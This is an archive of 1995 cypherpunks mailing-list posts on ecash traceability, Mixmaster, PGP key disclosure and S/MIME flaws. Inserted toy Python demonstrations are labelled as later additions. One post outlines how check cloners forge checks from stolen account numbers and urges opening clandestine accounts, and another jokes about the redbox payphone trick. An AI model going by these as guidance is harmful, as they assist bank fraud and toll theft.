>Consider this scenario ...  Mixmaster gets bought by the Acme
>Crypto Company of Ft. Meade, MD.  They "improve" it, and offer a new
>version.  It's even FREE (for non-commercial use)!  But their
>"improvements" make it incompatible with previous versions, and so
>you have to upgrade.  The new "commercial" version comes with no
>SOURCE CODE, of course...

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 15 Sep 95 02:08:39 PDT
To: cypherpunks@toad.com
Subject: Re: DD, pedophiles, and Terrorists, oh my
Message-ID: <199509150908.CAA22145@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:21 PM 9/14/95 -0400, Phill wrote:
>Yes, I was specifically referring to hard core images depicting intercourse with
>minors, including very young children. This was injected into the USEnet over a
>period of about 3 months from a number of sites. I do not know if the persons
>arrested today are the alleged source.

Anybody interested in doing a FOIA to find out whether the government is
posting them?  For that matter, is the Post Office, as a semi-non-governmental
organization, subject to FOIA?
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 15 Sep 95 02:08:46 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Why ecash is traceable
Message-ID: <199509150908.CAA22153@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I first reacted to Hal's posting about the way Tim did.
I got confused by the "Charlie" issue, but I think I see it.

>Why not "online clearing" as the preferred model, then?

It's probably still possible to do _some_ tracing in an online system.
As in the previous example, Alice is going to conspire with the
bank to catch Bob, _before_ she pays Bob the money; afterwards is 
too late.  Alice creates an account Alice2 and spends the cash.
Then she pays Bob the same cash.  When Bob tries to deposit it,
the bank notices it's already been spent, and does one of
1) rejects the payment using the normal double-spending prevention
   (not very useful for kidnapping/ransom cases, since Bob
    may kill the victim or whatever)
2) detects the double-spending but uses special-case software to
   tell Bob they're accepting the payment, and trace his account
   or trace the place he's depositing it from, or not actually credit
   it the money they're sending him a receipt for, or whatever.

If Bob wants to prevent the bank from tracing his deposit back to him,
he'll need an anonymous on-line connection; this would probably need
to be some sort of packet laundry, which is easy enough to implement,
or at least a fancy firewall.  If Bob is a real Bad Guy (as opposed
to Alice being the Bad Guy), Bob will probably set up some kind
of temporary account at the bank to deposit the money in,
followed rapidly by withdrawing the money and abandoning/closing
the account.  If Bob is a kidnapper, he probably kills the kid;
if he's just an undocumented retailer, he may not ship the pharmaceuticals,
or may start announcing that Alice is a probable narc.

>[online clearing vs. double-spender detection]
>I'm persuaded that the second approach, involving protocols for revealing
>double spending, is much messier than the "he who gets there first"
>protocol. The online clearing model largely emulates how real physical cash

There are difficulties, with online clearing, though - with physi-cash,
Bob can look at it and say "it looks good/bad" without actually
possessing it; with online clearing, he can lie about "it was pre-spent",
and there's no way to let him check the cash except by either giving it
to him or using messy all-or-nothing-disclosure-of-secrets techniques
(e.g. Alice and Bob flip a coin to decide whether Bob gets to spend
a pre-committed digibuck or Alice gets to demonstrate that it's ok
and spend it first) though an online system could reduce this problem
substantially by recording the time that a given digicash was spent
and reporting that time in double-spending rejections (a first-spending
at approximately the same time that Alice gives Bob the money and he deposits it
is obviously suspicious; it doesn't actually identify which one
of them cheated, though they'll both know (unless it was the bank cheating). 
A first-spending time substantially before that implicates Alice.)

>Well, since Alice knows her own blinding factors, she will always be able
>to say to the bank: "My cash will look like this. Watch for it."

Unfortunately, it's probably a lot harder to design a blinding system
that lets the payee blind the cash without allowing him to create
forged bills (at least forged bills based on a hard-to-identify
original bill.)

>My hunch, just a hunch, is that Chaum has been concentrating on the
>particular protocols which avoid online clearing and which avoid the
>payer/payee untraceability for pragmatic reasons.  Pragmatic as in
>"politically wise."
maybe so...
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
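
[Added example, not part of the original thread: a toy model of Chaum-style RSA blind signatures with online clearing. It shows "first to present wins," the first-spent time in rejections that the post above suggests, and the payer telling a colluding bank which coin to watch for. The key, serials, blinding factors, times and all names are constructed for illustration.]

```python
import hashlib
from math import gcd

# Constructed toy RSA key for the bank: two Mersenne primes, far too small for real use.
P, Q, E = 2**31 - 1, 2**61 - 1, 65537
N = P * Q
D = pow(E, -1, (P - 1) * (Q - 1))  # bank's private signing exponent


def coin_digest(serial: bytes) -> int:
    """Integer the bank signs for a coin with this serial number."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % N


def blind(serial: bytes, r: int) -> int:
    """Payer: hide the coin digest under blinding factor r before withdrawal."""
    if gcd(r, N) != 1:
        raise ValueError("blinding factor must be invertible mod N")
    return coin_digest(serial) * pow(r, E, N) % N


def unblind(blind_sig: int, r: int) -> int:
    """Payer: strip r from the bank's signature on the blinded value."""
    return blind_sig * pow(r, -1, N) % N


class Bank:
    def __init__(self):
        self.withdrawals = []  # blinded values: all the bank sees at withdrawal
        self.spent = {}        # serial -> time of first valid presentation
        self.watch = set()     # serials reported in advance by a colluding payer

    def sign_blinded(self, blinded: int) -> int:
        self.withdrawals.append(blinded)
        return pow(blinded, D, N)

    def deposit(self, serial: bytes, sig: int, now: int) -> dict:
        """Online clearing: the first valid presentation of a coin wins."""
        if pow(sig, E, N) != coin_digest(serial):
            return {"ok": False, "reason": "bad signature"}
        if serial in self.spent:
            # The rejection reports when the coin was first spent.
            return {"ok": False, "reason": "already spent",
                    "first_spent": self.spent[serial]}
        self.spent[serial] = now
        return {"ok": True, "flagged": serial in self.watch}


def withdraw(bank: Bank, serial: bytes, r: int) -> int:
    """Full withdrawal: blind, have the bank sign, unblind."""
    return unblind(bank.sign_blinded(blind(serial, r)), r)


def run_scenarios() -> dict:
    bank = Bank()
    out = {}

    # 1. Honest payment: Bob is the first to present the coin (t=10).
    s1 = b"constructed-coin-1"
    sig1 = withdraw(bank, s1, r=0x1234567)
    out["bank_saw_digest"] = coin_digest(s1) in bank.withdrawals
    out["honest"] = bank.deposit(s1, sig1, now=10)
    out["replay"] = bank.deposit(s1, sig1, now=11)

    # 2. Alice spends the coin herself at t=20, hands it to Bob at t=30,
    #    and Bob deposits at t=31. A first-spent time well before the
    #    handoff points at Alice.
    s2 = b"constructed-coin-2"
    sig2 = withdraw(bank, s2, r=0x7654321)
    bank.deposit(s2, sig2, now=20)
    out["bob_rejected"] = bank.deposit(s2, sig2, now=31)

    # 3. Alice knows her own blinding factor, so she can tell the bank
    #    what her cash will look like; blinding does not protect the payee.
    s3 = b"constructed-coin-3"
    sig3 = withdraw(bank, s3, r=0x2468ACE)
    bank.watch.add(s3)
    out["bob_flagged"] = bank.deposit(s3, sig3, now=40)
    return out


if __name__ == "__main__":
    for name, result in run_scenarios().items():
        print(name, result)
```
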





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 15 Sep 95 02:09:11 PDT
To: hallam@w3.org
Subject: Re: Scientology/Wollersheim as test case for key disclosure
Message-ID: <199509150908.CAA22173@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:42 PM 9/9/95 -0400, Phill wrote:
>One solution to this problem would be to modify PGP so that the session key for
>the document was released rather than the passphrase for the public key. The
>former would provide only read access, the latter would allow the scientologists
>to forge Wollersheim's signature on other material. In addition many of the
>documents may be subject to privilege.

It wouldn't be hard, though I'm not sure it's much different from requiring
the owner of the public key to decrypt the document in the first place.
It does give you some verifiability (somebody else can take the session key
and demonstrate that encrypting it with the recipient's public key does or 
does not produce the encrypted-key string in the document being verified.)
If that's what you plan to use it for, you would also need to have the
entire padded session key and not just the session key itself.

Total amount of work to implement - another command-line option, a print statement,
and maybe another command-line option and bit of code to allow decryption of a
public-key-encrypted document using a command-line-supplied session key.
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
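
[Added example, not part of the original message and not PGP's code: the verification described above. The key owner releases the whole padded session-key block for one message, and anyone can re-encrypt it under the public key and compare it with the encrypted-key field. The padding layout is a simplified PKCS #1 v1.5-style block rather than PGP's exact packet format; the key, seeds and function names are constructed for illustration.]

```python
import hashlib

# Constructed toy RSA key for the recipient: two Mersenne primes (not a safe real-world key).
P, Q, E = 2**521 - 1, 2**607 - 1, 65537
N = P * Q
D = pow(E, -1, (P - 1) * (Q - 1))
K = (N.bit_length() + 7) // 8  # modulus length in bytes


def filler(seed: bytes, length: int) -> bytes:
    """Deterministic stand-in for the sender's random nonzero padding bytes."""
    return bytes(b or 1 for b in hashlib.shake_256(seed).digest(length))


def pad(session_key: bytes, seed: bytes) -> bytes:
    """Simplified padded block: 00 02 <nonzero filler> 00 <session key>."""
    return b"\x00\x02" + filler(seed, K - 3 - len(session_key)) + b"\x00" + session_key


def encrypt_block(block: bytes) -> int:
    """Public-key operation: anyone can do this."""
    return pow(int.from_bytes(block, "big"), E, N)


def disclose(encrypted_key: int) -> bytes:
    """Key owner: release the padded block for ONE message; the private key stays private."""
    return pow(encrypted_key, D, N).to_bytes(K, "big")


def verify_disclosure(block: bytes, encrypted_key: int) -> bool:
    """Third party: re-encrypt the disclosed block and compare with the message's field."""
    return (len(block) == K and block[:2] == b"\x00\x02"
            and encrypt_block(block) == encrypted_key)


def session_key_from(block: bytes) -> bytes:
    """Everything after the first zero byte that follows the filler."""
    return block[block.index(b"\x00", 2) + 1:]


def demo() -> dict:
    real_key = hashlib.sha256(b"constructed session key").digest()[:16]
    # The encrypted-key field as it would appear in the message under dispute.
    encrypted_key = encrypt_block(pad(real_key, b"sender-random"))

    block = disclose(encrypted_key)

    # Bare session key only: the verifier has to supply padding of its own,
    # which will not match the sender's, so nothing can be confirmed.
    repadded = pad(real_key, b"verifier-guess")

    # A false claim about the session key fails the same check.
    fake_block = pad(b"\x41" * 16, b"sender-random")

    return {
        "full_block_verifies": verify_disclosure(block, encrypted_key),
        "recovered_key_matches": session_key_from(block) == real_key,
        "bare_key_verifies": verify_disclosure(repadded, encrypted_key),
        "false_key_verifies": verify_disclosure(fake_block, encrypted_key),
    }


if __name__ == "__main__":
    print(demo())
```
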





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 15 Sep 95 02:23:14 PDT
To: cypherpunks@toad.com
Subject: RE: Mixmaster status
Message-ID: <199509150922.CAA12760@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain



>Let me be crystal clear.
>1) I will not support any version of Mixmaster that is weakened.
>2) All future clients will be able to generate the current message format.
>3) All future servers will be able to read the current message format.
>4) There will always be a free version of the client with source code.

But will the commercial version of the server come with source code?

>While I have not discussed it, I can not imagine that there would not also
>be a free version of the server code (with source). Without remailers what
>is the point of the client software? 

Will Mixmaster become the Netscape(tm) of remailers?  And when is the IPO? ];>

|             Visualize whirled keys              | alano@teleport.com   |
|"It's only half a keyserver. I had to split the  | Disclaimer:          |
|other half with the government man." - Black Art | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald M. Kitchen" <don@cs.byu.edu>
Date: Fri, 15 Sep 95 01:48:22 PDT
To: tcmay@got.net
Subject: Re: Why ecash is traceable
Message-ID: <199509150847.CAA03047@bert.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Excellent discussion on the subject, actually. However, your idea of
the "first person to the bank" maintaining anonymity via remailer block
is flawed. First of all, if a collusion with the bank is being taken into
account, presumably sufficient enough resources are involved that someone
may try and track the reply block. Mixmaster (as your messages mentioned
by name) would be necessary to eliminate the chance of tracking the block
through combinations of replay attacks etc. (Which reminds me, has anyone
implemented an Expiration date on Type I remailers yet?? I remember someone
telling me it was being put into the RFC) However, mix does not have a
reply block system. Nor are there any Type I -> Mix gateways, for reasons
mentioned months ago. (PS, For historical sake, I was a strong supporter
of a Shamir Sharing Shell Game[tm] with the type I message. Everything
during those months came out of a rant program, so I can hardly expect you
to have saved them)
 
Soooo... Anyone up for a Shamir Sharing Shell game? Of course, a drop
box system would be *much* sexier. Combined with, say, an encrypted socket,
or maybe MIXing a packet straight to your door. (Every client a mix site,
remember? Just make yourself a mix key and give it to the drop box. I
figure if the TLA has you by then, you might as well trust the drop-box
operator too)
 
ObMiscCrypto:
Cypherpunk archives seem to have been down for a month, and a mailto://
didn't wake anybody up.
 
I got a message from Bob Silverman, apparently he would not be opposed
to giving his software to the C-punk key Cracking Ring, Inc. as a group
on the understanding that the group lend him some factored numbers.
He reports having no PGP key, so getting a PGP sig won't be happening.
Perhaps someone who knows him or someone who knows about factoring
software would volunteer to get the goods? 

ObHiMom: Hi Mom.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Barrett <barrett@iafrica.com>
Date: Thu, 14 Sep 95 19:00:27 PDT
To: Dar Scott <dsc@swcp.com>
Subject: [NOISE] Re: Linking = Showing = Transferring?
In-Reply-To: <v01510101ac7e7081b71f@[198.59.115.134]>
Message-ID: <Pine.NEB.3.91.950915024828.298Z-100000@daisy.ee.und.ac.za>
MIME-Version: 1.0
Content-Type: text/plain


> I wonder if I have a pornopage.

Of course you do (assuming the stupid transitive definition of a
pornopage). 

Start at your home page
    http://www.swcp.com/~correspo/DSC/DarScott.html
--> follow link to "National Instruments" in second paragraph
    http://www.natinst.com/
--> follow link to "Reference" a few lines from the bottom of the page
    http://www.natinst.com/links.htm
--> "WWW Virtual Library" near the top of the page
    http://epims1.gsfc.nasa.gov/engineering/ee.html
--> "WWW Virtual Library" right at the top of page
    http://www.w3.org/hypertext/DataSources/bySubject/Overview.html
--> "Other virtual libraries" near the bottom of the (rather long) page
    http://www.w3.org/hypertext/DataSources/bySubject/Virtual_libraries/Overview.html
--> "Yahoo - A Guide to WWW"
    http://www.yahoo.com/
--> "Entertainment"
    http://www.yahoo.com/text/Entertainment/
--> "Magazines"
    http://www.yahoo.com/text/Entertainment/Magazines/
--> "Sex"
    http://www.yahoo.com/text/Entertainment/Magazines/Sex/
--> you figure out the rest





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Fri, 15 Sep 95 00:27:55 PDT
To: cypherpunks@toad.com
Subject: Check Cloning frenzy and attack on anonymous accounts
Message-ID: <Pine.SUN.3.91.950915032650.5324A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



Cypherpunks might want to take note of the recent flurry of news program 
stings on banks which do not demand 12 pieces of identification in order 
to open an account.

The latest horseman, check "cloners."

Two networks have now run hidden camera stings on banks where they offer 
all manner of obnoxious fake identification and open accounts in silly 
names.

The "purpose" being to expose the ease with which a dreaded check 
"cloner" can open an account to transfer your funds into.

The process goes something like this:

Check cloner gets account number from ATM slip or otherwise. Check 
cloner prints up 30 "checks" in any name at all with magnetic ink 
account number on the bottom for the benefit of automatic readers at the 
bank.  Checks are written to the account in false name and withdrawn.

For some reason, the focus seems to be on the ease with which one opens 
an account- rather than with the need to safeguard account information, 
and the lack of oversight by banks.  Of course, the liability for these 
crimes is with the bank, which cleared a check without the proper 
signature.

Of course, the immediate solution, rather than insuring the banks pay 
their liability for their insecure payments and check clearing system, 
and their printing account information on any piece of paper they can 
find, is going to be a crackdown on account identification- and probably 
legislation.  (Note that often banks take months to pay the shortfall- 
when they do at all).  New accounts can expect to have to cough up 
significant identification and I predict a renewed call for national 
identification credentials.

Tell the banks they have to pay within 2 days of the presentation by the 
duped depositor of the fraudulent checks and I would lay odds that the 
banks would be screaming bloody murder for a more secure payments and 
check clearing system than the trash they have now.  Of course, because 
of the ignorance of the media, this will never happen.  Of course, 
paying in cash will never be looked to as an answer either.

Typical creeping statism.


I suggest those of you who open clandestine accounts open a flurry now, 
before things get tough.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kelso@netcom.com (Tom Rollins)
Date: Fri, 15 Sep 95 05:23:39 PDT
To: pfarrell@netcom.com
Subject: Re: Why ecash is traceable
In-Reply-To: <28922.pfarrell@netcom.com>
Message-ID: <199509151220.FAA00243@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Pat Farrell says:
> Because you lose most (all?) anonymous abilities. (I think) 
> So when the money Alice gave to Bob gets deposited by TCMay,
> That it was Alice's is instantly known. This is not how physical cash works.
> 
> There is a chain from TCMay through some number of steps to Bob.
> Even if you can't find it with this single case, you could use
> a zero-knowledge type proof to slowly uncover Bob's identity.
> 
> I keep wanting to believe in ecash, but I'm not convinced
> it can exist.

Just a little humor...
Perhaps Electronic Cash has a sound.
Phone Phreakers have something called a Redbox.
This device makes the sound of a quarter.
When an ATT pay phone asks you to deposit $1.75
you just make the sound of 7 quarters... :)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Fri, 15 Sep 95 02:49:17 PDT
To: cypherpunks@toad.com
Subject: Re: cryptography eliminates lawyers?
Message-ID: <199509150944.FAA48388@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Brian Davis wrote:

<snip>

>Last I checked, FDA, UL, or state bar association approval does not 
>*require* you to take, use, or hire the approved drug, toaster or lawyer.  
>Market forces are still at work, albeit in a filtered environment.

The filter is weakest from UL, yet I trust its output the most.

>Just a first cut.  And even that can usually be gotten around.

Getting around David KeSSler involves about $30 million and a *bunch*
of lawyers. Skipping this first cut, even with far safer products (IMO)
than "Proscar," can lead to an armed raid of your doctor's office.
If state bars can usually be gotten around, why take three of them?
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

-----END PGP SIGNATURE-----
Regards, Jim Ray

"When making public-policy decisions for the government, I think one
should ask oneself which technologies would best strengthen the hand
of a police state. Then, do not allow the government to deploy those
technologies."  -- Phillip Zimmermann, talking to himself. (Congress
sure-as-hell wasn't paying attention!)
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James M. Ray  <liberty@gate.net>
-----------------------------------------------------------------------
Help Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
_______________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 15 Sep 95 02:59:33 PDT
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Linking = Showing = Transferring?
In-Reply-To: <199509150047.UAA18025@book.hks.net>
Message-ID: <Pine.SUN.3.91.950915055557.22150A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 14 Sep 1995, Lucky Green wrote:

> The answer is trivial. If it pisses off the fascists in power enough, you
> go to jail or get killed.
> 
> - -- 
> - -- Lucky Green <mailto:shamrock@netcom.com>

As a libertarian nut, I bow to no one in my love of extreme statements.  
But I feel compelled to squash this particular notion whenever I see it.  
Randy Weaver really pissed off the Feds and did not go to jail (except 
during trial) and received a $3.1 million settlement.  (.1 to him, 3 to 
the kids but they are minors).

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 15 Sep 95 04:15:11 PDT
To: rsalz@osf.org
Subject: Re: Linking = Showing = Transferring?
Message-ID: <9509151114.AA07872@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Another even more subtle problem is inline images, can you say that a
>page with an inline image sourced from a foreign site must obey the
>foreign jurisdiction.  I would assert this is so, because the web
>surfer's *browser* imports the relevant parts of the page from
>whatever locations (and jurisdictions) they are in, and displays them
>as one page.

Inline images are not references -- they are part of the page being
retrieved.  

>	<img src="http://www.dcs.ex.ac.uk/~aba/obscura/rsa.gif">
>So that the image is *imported* by the *viewer*, and not supplied by
>www.obscura.

Inlined images are just a convenient way of chunking.  The image is imported
by the viewer because the server, as part of the base document, told it
to do so.  You might be able to fool an ignorant court, but it still
doesn't change the fact that Lance has a document that in the natural
course of operation of the Web, exports crypto.  I would advise him to
edit the page so it reads
	Click <A HREF="http://www.dcs.ex.ac.uk/~aba/obscura/rsa.gif">here</A>
	to see a picture of the shirt.

Heck, the very word, "inline" gives it away.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 15 Sep 95 04:18:35 PDT
To: cypherpunks@toad.com
Subject: Some informed comments on RSA's S/MIME
Message-ID: <9509151118.AA07881@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Date: Thu, 14 Sep 1995 08:39:49 -0700 (PDT)
From: Ned Freed <NED@innosoft.com>
Subject: Re: Re[2]: MOSS conformance testing
Cc: pem-dev@TIS.COM
Message-id: <01HV9F2PHBSU8Y4Z8U@INNOSOFT.COM>

> I just got wind of RSA's draft for Content-Type: application/x-pkcs7-mime.
> Has there been any discussion on this - comparison to PEM etc.? If so
> where's the list, URLs of archives....? Or did I just go "deaf" for a while
> here on this list? (The last couple of months have been caught up in
> changing companies...)

S/MIME was developed privately by RSA in conjunction with a number of other
companies. To the best of my knowledge all discussion has occurred on closed,
private lists. As a potential customer of RSA I recently managed to get myself
added to one of these lists (it may or may not be the only one where S/MIME is
discussed) but I haven't had time to post anything there yet. I plan to post
this message there in the next couple of days.

I'm not saying this approach to protocol development is a good thing or a bad
thing, but I do believe that it has led to the production of a specification
that is seriously flawed, and that those flaws would have been detected and
probably corrected had the discussion been more public.
More on this below.

> I browsed through the IETF drafts & personal contributions & search tool...
> didn't find anything on RSA's "S/MIME".

> I did get the PostScript file from RSA's pages & had a read....

> http://www.rsa.com/pub/S-MIME/

The specification, at least, is public. Given the amount of press surrounding
this proposal and the strong likelihood of it being widely used I strongly
recommend that everyone who is interested in email security obtain a
copy of the specification and read it.

However, the proposal is simple enough that it can be summarized in just two
paragraphs. S/MIME is based on PKCS #7, which in turn is based on classic PEM.
The significant difference between PKCS #7 and PEM is that it uses an ASN.1
encoding for the entire security object rather than the header/text encoding of
RFC1421. In fact the specification states that mechanical conversion between
RFC1421 formats and PKCS #7 should be possible as long as the proper set of
algorithms are used. I think that mechanical conversion into and out of the
PEM-derived subset of MOSS is also feasible but I haven't checked up on the
specifics of this.

S/MIME in turn is a simple encapsulation of PKCS #7 in MIME, consisting of an
application subtype label and an encoding of the PKCS #7 object using standard
MIME encodings. The inner secured content is then seen as another MIME object.
This is almost identical to Jeff Schiller's earlier proposal for embedding PEM
in MIME. There is only one significant twist -- in the case of signed but not
encrypted data the specification calls for the use of multipart/alternative,
with the first part being an unsigned copy of the signed data and the second
part being the PKCS #7 object, including the signed data.

Two obvious flaws in this approach should be obvious from this description. The
first is simply one of excessive overhead -- sending signed material in such a
way that it can be read on vanilla email systems as well as with an S/MIME
system introduces something on the order of 133% overhead.

The second flaw is more serious. The data that a user without S/MIME reads is
not signed. This opens the door to attacks where the unsigned version is
tampered with but the signed version is left alone.

This turns into a really insidious problem when you consider how privacy
services are likely to be deployed in some environments. One model I expect to
be rather popular is that of having a remote signature verification service
within a secure enclave. That is, most of the user agents that people use won't
have the ability to validate a signature. Users will, however, have secure
access to an agent that will validate the signature on a message for them. (The
service may well be a different application on the same machine.) They simply
submit the message to this service and it tells them whether or not the
signature matches.

The problem, of course, is that the material the user of the unextended agent
reads isn't what's signed. And in general there is no way to correlate this
material with the signed copy -- since it was exposed to the message transport
layer without any special tagging to indicate its signed nature the transport
may well have changed it so it's no longer a byte-for-byte copy of the signed
version (which is inherently protected against such munging). 

Comparing this approach with security multiparts is quite instructive. Security
multiparts only introduces the overhead necessary to encode the single copy of
the data -- at most 33% in the case of base64 -- plus of course the fixed
overhead of the signature information. As such, it is far more efficient than
S/MIME when it comes to signed but unencrypted material. Security multiparts
can be processed in a single pass as well. I'm not sure this is true of S/MIME
-- it depends on the specifics of the ASN.1 structure that's used. But by far
the most important difference is that security multiparts do not suffer from
this vulnerability when used in an environment with remote security servers. 

You can of course avoid this problem by not including the extra copy of the
signed material. The problem with this approach is that you won't be able to
read such a message on anything short of an agent that knows how to take apart
a PKCS #7 structure.

I note in passing that there was absolutely no reason why security multiparts
could not have been used in S/MIME instead of the chosen encapsulation. PKCS #7
explicitly provides a facility whereby the secured data is stored outside of
the ASN.1 object. This then fits seamlessly into the security multiparts
methodology.

I do not propose to debate the relative merits of PKCS #7 versus MOSS. Modulo
the MIME issues this is essentially the same as debating the merits of PEM
versus MOSS, and I've had more of that than I care for. Besides, I think folks
should use whatever security service they feel like using. I've maintained all
along that my interest is primarily that of standardizing on a single embedding
methodology for use with MIME. I'm very disappointed that S/MIME has seen fit
to use what to my mind is a technically inferior embedding solution when
compared to security multiparts, and I'd really like to try to get the S/MIME
folks to switch to a security multiparts approach if it's not too late for them
to do so.

I'm very interested in any and all comments on what I've written here. I intend
to post them to the S/MIME list I'm now on.

				Ned
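
The two layouts compared in the message above, as an added example that is not part of the original post: a multipart/alternative message whose readable first part sits outside the signed object, next to a multipart/signed message whose signature covers the part the reader sees. Assumptions: HMAC-SHA256 under a constructed key stands in for the public-key signature, a JSON blob stands in for the ASN.1 PKCS #7 object, `application/x-demo-signature` is a made-up type, and the signature here covers only the decoded content of the first part, not its MIME headers.

```python
import base64
import hashlib
import hmac
import json
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

# Assumption: HMAC-SHA256 under a constructed key stands in for the signer's
# public-key signature. Only the MIME layout matters for this demonstration.
DEMO_KEY = b"constructed-demo-key"

# Constructed sample texts.
ORIGINAL = "Meeting moved to Tuesday 10:00."
ALTERED = "Meeting moved to Friday 17:00."


def sign(data: bytes) -> str:
    return hmac.new(DEMO_KEY, data, hashlib.sha256).hexdigest()


def signature_ok(data: bytes, sig: str) -> bool:
    return hmac.compare_digest(sign(data), sig)


def build_alternative(text: str) -> MIMEMultipart:
    """Layout from the message: unsigned readable copy + opaque signed object."""
    body = text.encode("ascii")
    # JSON stand-in for the PKCS #7 object: it carries its own copy of the
    # content together with the signature over that copy.
    blob = json.dumps({"content": base64.b64encode(body).decode("ascii"),
                       "sig": sign(body)}).encode("ascii")
    msg = MIMEMultipart("alternative")
    msg.attach(MIMEText(text, "plain", "us-ascii"))
    msg.attach(MIMEApplication(blob, "x-pkcs7-mime"))
    return msg


def build_signed(text: str) -> MIMEMultipart:
    """Security-multiparts layout: one copy of the data + detached signature."""
    msg = MIMEMultipart("signed", protocol="application/x-demo-signature")
    msg.attach(MIMEText(text, "plain", "us-ascii"))
    msg.attach(MIMEApplication(sign(text.encode("ascii")).encode("ascii"),
                               "x-demo-signature"))
    return msg


def modify_first_part(msg: MIMEMultipart, new_text: str) -> None:
    """Model a change made to the readable part somewhere in transit."""
    msg.get_payload(0).set_payload(new_text)


def check_alternative(msg: MIMEMultipart) -> dict:
    """What a verification service can report for the alternative layout."""
    readable, obj = msg.get_payload()
    blob = json.loads(obj.get_payload(decode=True))
    signed_copy = base64.b64decode(blob["content"])
    return {
        # Checks only the copy inside the signed object.
        "signature_valid": signature_ok(signed_copy, blob["sig"]),
        # Extra comparison a verifier would have to add. As the message
        # notes, benign transport changes can also break byte equality.
        "readable_matches_signed":
            readable.get_payload(decode=True) == signed_copy,
    }


def check_signed(msg: MIMEMultipart) -> bool:
    """The signature is checked against the very part the reader sees."""
    data, sig = msg.get_payload()
    return signature_ok(data.get_payload(decode=True),
                        sig.get_payload(decode=True).decode("ascii"))


def demo() -> dict:
    alt = build_alternative(ORIGINAL)
    sec = build_signed(ORIGINAL)
    before = check_alternative(alt)
    modify_first_part(alt, ALTERED)
    modify_first_part(sec, ALTERED)
    return {"alternative_before": before,
            "alternative_after": check_alternative(alt),
            "signed_after": check_signed(sec)}


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```
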





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 15 Sep 95 07:49:44 PDT
To: cypherpunks@toad.com
Subject: Re: Why ecash is traceable
Message-ID: <199509151448.HAA21190@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry, I don't have time to write much now.  The missing piece in my
description was the assumption that people would have to send received
cash to the bank non-anonymously.  However as Tim points out that can
be avoided in on line systems, and in that case Alice cannot actually
learn Bob's identity.  However as was also pointed out the cash can at
least be detected and invalidated so technically it is still traceable.
The protection of the payor is still not really as strong as that of
the payee.

I should also mention that when we discussed this earlier Jason Solinsky
suggested that transferrable cash systems also provide a means for Bob
to keep his identity secret.  The cash is still traceable in that the
bank can recognize it when it is finally deposited, but it may have
